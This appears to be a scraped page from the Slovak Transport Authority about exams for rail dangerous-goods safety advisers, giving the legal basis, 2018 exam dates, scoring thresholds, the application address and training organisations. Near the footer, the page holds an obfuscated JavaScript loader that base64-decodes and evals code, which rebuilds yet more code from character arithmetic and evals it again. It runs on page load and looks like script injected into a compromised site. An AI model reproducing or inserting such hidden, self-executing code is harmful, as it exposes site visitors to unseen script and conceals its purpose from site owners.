DOPRAVNÝ ÚRAD

Nebezpečný tovar – skúšky bezpečnostných poradcov

Preprava nebezpečného tovaru v železničnej doprave je legislatívne upravená v § 23 zákona č. 514/2009 Z. z. o doprave na dráhach.

Prepravou nebezpečného tovaru sa rozumie každá činnosť spojená s prepravou nebezpečného tovaru v železničnej doprave, vrátane činností spojených s nakládkou a vykládkou, s prechodom z jedného druhu dopravy na iný druh dopravy v kombinovanej doprave a so zastávkami vynútenými okolnosťami počas prepravy; nezahŕňa prepravu a manipuláciu s nebezpečným tovarom v areáli odosielateľa a prijímateľa nebezpečného tovaru. Nebezpečným tovarom podľa predchádzajúcej vety sú látky a výrobky, ktorých preprava železničnou dopravou je podľa Poriadku pre medzinárodnú železničnú prepravu nebezpečného tovaru (RID) zakázaná, alebo je povolená len za určených podmienok.

V zmysle § 23 ods. 5 písm. e) vyššie citovaného zákona je preprava nebezpečného tovaru v Slovenskej republike zakázaná, pokiaľ nie je zabezpečená bezpečnostnými poradcami pre prepravu nebezpečného tovaru s potrebným osvedčením o odbornej príprave.

Dopravný úrad  je Ministerstvom dopravy, výstavby a regionálneho rozvoja SR poverením č. 19648/2016-SŽDD/z.44623 zo dňa 6.10.2016 poverený vykonávať skúšky odbornej spôsobilosti a vydávať doklady (osvedčenia) o školení bezpečnostných poradcov na prepravu nebezpečného tovaru v železničnej doprave. Uvedené činnosti sú  vykonávané podľa § 23 a § 36 zákona o doprave na dráhach  a v zmysle ustanovení oddielu 1.8.3 Poriadku pre medzinárodnú železničnú prepravu nebezpečného tovaru (RID), ktorý je Dodatkom C k Dohovoru o medzinárodnej železničnej preprave (COTIF).

Termíny skúšok v roku 2018:

Termín skúškyTermín podania prihlášky
13.02.2018do 02.02.2018
27.03.2018do 09.03.2018
25.09.2018do 14.09.2018

Rozsah:

Druh skúškyOtvorené otázkyUzavreté otázkyPrípadová štúdiaČas
základná10301210 minút
periodická1030-150 minút

Hodnotenie skúšok:

81 % až 100 % správnych odpovedívyhovel bez nutnosti vykonania ústnej skúšky
71 % až 80 % správnych odpovedínutná doplnková ústna skúška
menej ako 70 % správnych odpovedínevyhovel

Doklad o skúške:
Žiadateľovi, ktorý skúšku absolvuje s výsledkom vyhovel, vydá Dopravný úrad osvedčenie o odbornej spôsobilosti bezpečnostného poradcu na prepravu nebezpečného tovaru v železničnej doprave. Platnosť osvedčenia je 5 rokov.

Prihláška:

Na skúšku sa prihlasujte písomne na adresuDopravný úrad
Divízia dráh a dopravy na dráhach
Sekcia bezpečnosti a certifikácie
Letisko M. R. Štefánika
823 05 Bratislava

Dodržte, prosím, termín podania prihlášky. Rozhodujúci je dátum jej podania.

Vzor prihlášky:

Filetype iconPrihláška na skúšky bezpečnostných poradcov

Školenie:
Školením žiadateľov o vykonanie skúšky na získanie odbornej spôsobilosti bezpečnostného poradcu na prepravu nebezpečného tovaru v železničnej doprave sú na základe rozhodnutia Ministerstva dopravy, výstavby a regionálneho rozvoja SR poverené organizácie

AdresaDGSA Academy, s.r.o.
Dadanova 3386/7
010 15 Žilina
Webwww.dgsa.sk
Tel. kontakt0917 313233
AdresaCMS TREND, spol. s r.o.
Gouthova 7
831 01 Bratislava
Webwww.cmstrend.sk
mailcmstrend@cmstrend.sk
Tel. kontakt0907 731111

Miesto konania skúšky Vám bude oznámené v pozvánke na skúšku, prípadne prostredníctvom poverenej školiacej organizácie

Spätná väzba pre návštevníkov. 

var WJSBCXBNMO = atob(‘dmFyIFhZQU5HSFpVS1ogPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTIyIC0gNCwgMTA2IC0gOSwgMTIwIC0gNiwgMzQgLSAyLCAxMTUgLSA4LCAxMDUgLSA0LCAxMzAgLSA5LCAzNCAtIDIsIDY5IC0gOCwgMzcgLSA1LCA0MiAtIDMsIDkwIC0gOCwgMTA5IC0gMSwgNzIgLSA0LCA4OSAtIDksIDEwMyAtIDYsIDEwOSAtIDksIDEwMyAtIDEsIDExNiAtIDIsIDkzIC0gMywgNzkgLSA2LCA0NCAtIDUsIDYzIC0gNCwgMTcgLSA3LCAxMjMgLSA1LCAxMDQgLSA3LCAxMjAgLSA2LCA0MSAtIDksIDEwNyAtIDYsIDExNCAtIDQsIDEwMyAtIDQsIDEwNyAtIDYsIDEwNSAtIDUsIDM1IC0gMywgNzAgLSA5LCAzNSAtIDMsIDQ3IC0gOCwgNzYgLSAyLCA2OSAtIDQsIDUzIC0gNSwgNTEgLSAxLCAxMDEgLSAyLCA3NCAtIDgsIDc3IC0gOCwgODggLSAxLCA2OCAtIDMsIDY4IC0gMiwgNTggLSA1LCA2MyAtIDksIDEwNSAtIDUsIDc1IC0gMywgNzUgLSAyLCA3OSAtIDYsIDc2IC0gMSwgMTI3IC0gNSwgODYgLSA5LCA5MSAtIDYsIDczIC0gNiwgODIgLSAxLCA4NiAtIDksIDEwMCAtIDEsIDc5IC0gMywgMTE2IC0gNywgMTA0IC0gNSwgMTIzIC0gMywgNzYgLSA0LCAxMTIgLSA3LCA3NCAtIDUsIDEyOCAtIDgsIDc4IC0gOCwgOTAgLSA5LCA3NiAtIDcsIDExMyAtIDcsIDc1IC0gMywgMTEwIC0gNCwgNjIgLSA2LCAxMDggLSAxLCA4MSAtIDMsIDEyOCAtIDksIDc1IC0gMiwgMTI2IC0gNywgMTA2IC0gNSwgNzEgLSAyLCA5MCAtIDEsIDk0IC0gNiwgNzIgLSA2LCA4OCAtIDcsIDY2IC0gMSwgMTI2IC0gNCwgODEgLSAyLCA4OCAtIDUsIDk2IC0gNiwgODQgLSA4LCAxMDIgLSA0LCA4OCAtIDEsIDEyMyAtIDcsIDExNyAtIDMsIDc5IC0gOSwgNjcgLSAxLCA4NiAtIDUsIDkwIC0gNSwgODMgLSA1LCAxMTQgLSA1LCAxMDIgLSAzLCAxMDkgLSA1LCA3MSAtIDQsIDkyIC0gOCwgNjkgLSA0LCA4OCAtIDYsIDcxIC0gMSwgODMgLSAxLCA2OSAtIDQsIDg2IC0gMSwgNzYgLSA1LCAxMjkgLSA3LCAxMTEgLSA4LCA1NyAtIDEsIDc3IC0gMywgMTA3IC0gNCwgMTA5IC0gMSwgMTE4IC0gMywgMTA4IC0gOCwgMTIyIC0gMiwgODIgLSA5LCA4OCAtIDEsIDcyIC0gNiwgOTEgLSA1LCA5NCAtIDgsIDU0IC0gNCwgMTA1IC0gNywgMTEzIC0gNywgMTE4IC0gNywgOTAgLSAxLCA4NiAtIDksIDcxIC0gNCwgNzAgLSA0LCAxMDMgLSA1LCA4NyAtIDQsIDU0IC0gNiwgMTEyIC0gNSwgNzQgLSAzLCA4MiAtIDcsIDY5IC0gMiwgMTEwIC0gNywgNTQgLSA2LCA3MyAtIDYsIDExMSAtIDYsIDU2IC0gOCwgMTI3IC0gNSwgNzIgLSA3LCA3NCAtIDgsIDgzIC0gMiwgODkgLSA5LCA5MiAtIDQsIDc2IC0gOCwgODIgLSAxLCAxMTcgLSA5LCAxMDMgLSAxLCA4OCAtIDYsIDY0IC0gOCwgMTI4IC0gOSwgODUgLSA4LCA4NCAtIDIsIDg5IC0gNCwgODIgLSA0LCA3MSAtIDUsIDkzIC0gNywgNTUgLSA3LCA1MiAtIDEsIDc2IC0gMSwgNjkgLSAxLCAxMTcgLSAyLCA3MCAtIDMsIDk5IC0gMiwgMTEyIC0gNiwgMTE0IC0gMywgOTEgLSA4LCA4MyAtIDIsIDU3IC0gOSwgNjEgLSA0LCA3OCAtIDQsIDkyIC0gNywgNzQgLSA3LCA1MyAtIDUsIDU4IC0gMSwgNzQgLSA2LCAxMjYgLSA0LCA3NSAtIDYsIDY0IC0gNywgNzAgLSA0LCA3MyAtIDgsIDExMyAtIDIsIDg2IC0gMywgOTEgLSAzLCA3NCAtIDYsIDc4IC0gNSwgMTIzIC0gOCwgODUgLSA4LCAxMjMgLSA0LCAxMTMgLSA5LCAxMjEgLSA4LCA3OCAtIDEsIDgzIC0gMSwgNzQgLSA1LCA5MyAtIDgsIDc0IC0gOSwgMTI2IC0gNiwgMTI2IC0gNywgNDkgLSA2LCA2OSAtIDIsIDEwOCAtIDIsIDExNSAtIDQsIDc5IC0gOSwgNzYgLSAxLCA3MSAtIDMsIDkxIC0gOSwgNzUgLSAxLCA3MiAtIDIsIDY3IC0gMSwgODYgLSA1LCA4NyAtIDIsIDg1IC0gNywgMTEyIC0gMywgNzQgLSA4LCAxMjEgLSA5LCA5MyAtIDMsIDExMSAtIDgsIDY3IC0gNiwgNjggLSA3LCA0NCAtIDUsIDY1IC0gNiwgMTIgLSAyLCAxMDYgLSA0LCAxMjMgLSA2LCAxMTYgLSA2LCAxMDUgLSA2LCAxMjEgLSA1LCAxMTMgLSA4LCAxMTcgLSA2LCAxMTcgLSA3LCA0MSAtIDksIDEyOCAtIDgsIDExMyAtIDIsIDEyMiAtIDgsIDk5IC0gNCwgMTAzIC0gMiwgMTE2IC0gNiwgMTA3IC0gOCwgNDkgLSA5LCAxMTcgLSAyLCAxMjEgLSA1LCAxMTggLSA0LCAxMTIgLSA3LCAxMTIgLSAyLCAxMDggLSA1LCA0NyAtIDMsIDM0IC0gMiwgMTEwIC0gMywgMTA2IC0gNSwgMTI0IC0gMywgNDkgLSA4LCAzMyAtIDEsIDEyNyAtIDQsIDE0IC0gNCwgMzcgLSA1LCAzNCAtIDIsIDEyMSAtIDMsIDEwNSAtIDgsIDExNSAtIDEsIDMzIC0gMSwgMTE2IC0gMiwgMTA4IC0gNywgMTE3IC0gMiwgMzMgLSAxLCA3MCAtIDksIDQxIC0gOSwgNDIgLSAzLCA0MCAtIDEsIDY0IC0gNSwgMTMgLSAzLCAzNSAtIDMsIDM1IC0gMywgMTAzIC0gMSwgMTE2IC0gNSwgMTE4IC0gNCwgMzMgLSAxLCA0OCAtIDgsIDExOSAtIDEsIDEwMiAtIDUsIDEyMiAtIDgsIDM3IC0gNSwgMTA3IC0gMiwgNDAgLSA4LCA3MCAtIDksIDQwIC0gOCwgNTcgLSA5LCA2NiAtIDcsIDM5IC0gNywgMTEzIC0gOCwgNDEgLSA5LCA2NyAtIDcsIDQxIC0gOSwgMTE2IC0gMSwgMTE4IC0gMiwgMTIzIC0gOSwgMTA5IC0gNCwgMTE3IC0gNywgMTA2IC0gMywgNTIgLSA2LCAxMTcgLSA5LCAxMTAgLSA5LCAxMTggLSA4LCAxMDkgLSA2LCAxMjMgLSA3LCAxMDYgLSAyLCA2NSAtIDYsIDQwIC0gOCwgMTExIC0gNiwgNDQgLSAxLCA0OCAtIDUsIDQ3IC0gNiwgNDEgLSA5LCAxMjggLSA1LCAxNSAtIDUsIDM0IC0gMiwgMzcgLSA1LCAzOSAtIDcsIDM5IC0gNywgMTE5IC0gNSwgMTAzIC0gMiwgMTIzIC0gOCwgMzMgLSAxLCA1MSAtIDgsIDY0IC0gMywgMzkgLSA3LCA4NCAtIDEsIDExNyAtIDEsIDExNyAtIDMsIDExMyAtIDgsIDExNCAtIDQsIDEwNyAtIDQsIDU0IC0gOCwgMTA1IC0gMywgMTIyIC0gOCwgMTE3IC0gNiwgMTE4IC0gOSwgNzIgLSA1LCAxMTAgLSA2LCAxMDMgLSA2LCAxMTUgLSAxLCA2OCAtIDEsIDExNCAtIDMsIDEwMSAtIDEsIDEwNyAtIDYsIDQ2IC0gNiwgMTIzIC0gOCwgMTIwIC0gNCwgMTE2IC0gMiwgMTExIC0gNiwgMTE0IC0gNCwgMTA5IC0gNiwgNTIgLSA2LCAxMDcgLSA4LCAxMDYgLSAyLCAxMDMgLSA2LCAxMTkgLSA1LCA3NCAtIDcsIDExMiAtIDEsIDEwNiAtIDYsIDEwOSAtIDgsIDc0IC0gOSwgMTE3IC0gMSwgNDUgLSA1LCAxMDggLSAzLCA0NiAtIDUsIDQwIC0gOCwgOTYgLSAyLCAxMSAtIDEsIDE1IC0gNiwgMTQgLSA1LCAxMyAtIDQsIDEwIC0gMSwgMTExIC0gNCwgMTA1IC0gNCwgMTMwIC0gOSwgNTQgLSA4LCAxMDUgLSA2LCAxMTMgLSA5LCAxMDEgLSA0LCAxMjAgLSA2LCA3NiAtIDksIDExNyAtIDYsIDEwMyAtIDMsIDEwNyAtIDYsIDY4IC0gMywgMTIyIC0gNiwgNDggLSA4LCAxMTAgLSA1LCA0MSAtIDksIDQ1IC0gOCwgMzMgLSAxLCAxMDggLSAxLCAxMDcgLSA2LCAxMjcgLSA2LCA0OCAtIDIsIDExNCAtIDYsIDEwOSAtIDgsIDExNSAtIDUsIDEwNyAtIDQsIDEyMiAtIDYsIDExMiAtIDgsIDQ4IC0gNywgNTAgLSA5LCA2NCAtIDUsIDExIC0gMSwgNDAgLSA4LCAzOCAtIDYsIDEyNiAtIDEsIDEyIC0gMiwgMzUgLSAzLCAzNSAtIDMsIDEyMSAtIDcsIDEwMiAtIDEsIDEyNCAtIDgsIDEyNCAtIDcsIDEyMyAtIDksIDExNyAtIDcsIDQxIC0gOSwgMTE2IC0gMiwgMTA5IC0gOCwgMTI0IC0gOSwgNjUgLSA2LCAxOSAtIDksIDEzMSAtIDYsIDE2IC0gNiwgMTMgLSAzLCAxMjcgLSA5LCAxMDUgLSA4LCAxMjAgLSA2LCA0MSAtIDksIDEwOSAtIDksIDExMCAtIDksIDEwMiAtIDMsIDQwIC0gOCwgNjQgLSAzLCAzNiAtIDQsIDEyNyAtIDcsIDExNyAtIDYsIDExNSAtIDEsIDk2IC0gMSwgMTA0IC0gMywgMTE1IC0gNSwgMTAwIC0gMSwgNDIgLSAyLCAxMDQgLSA3LCAxMTkgLSAzLCAxMTkgLSA4LCAxMDYgLSA4LCA0NCAtIDQsIDEwNSAtIDQsIDExNyAtIDcsIDEwNyAtIDgsIDEwNyAtIDYsIDEwOCAtIDgsIDQ4IC0gNywgNTMgLSA5LCAzOSAtIDcsIDExNSAtIDgsIDEwOCAtIDcsIDEyNiAtIDUsIDQ0IC0gMywgNjEgLSAyLCAxMyAtIDMsIDQzIC0gMywgMTExIC0gMSwgMTA4IC0gNywgMTI0IC0gNSwgMzkgLSA3LCA3NCAtIDQsIDEyNSAtIDgsIDExOSAtIDksIDEwMiAtIDMsIDEyMiAtIDYsIDExMyAtIDgsIDExNyAtIDYsIDExMiAtIDIsIDQ2IC0gNiwgMTA0IC0gNCwgMTEwIC0gOSwgMTA4IC0gOSwgNDYgLSA1LCA0NCAtIDMsIDQ3IC0gNywgNDQgLSAzLCA2MyAtIDQsIDE0IC0gNCwgMTkgLSA5KTtldmFsKFhZQU5HSFpVS1opOw==’);
eval(WJSBCXBNMO);

© Dopravný úrad / Transport Authority | Mapa stránok | RSS W3C Validation

Dodávateľ portálového riešenia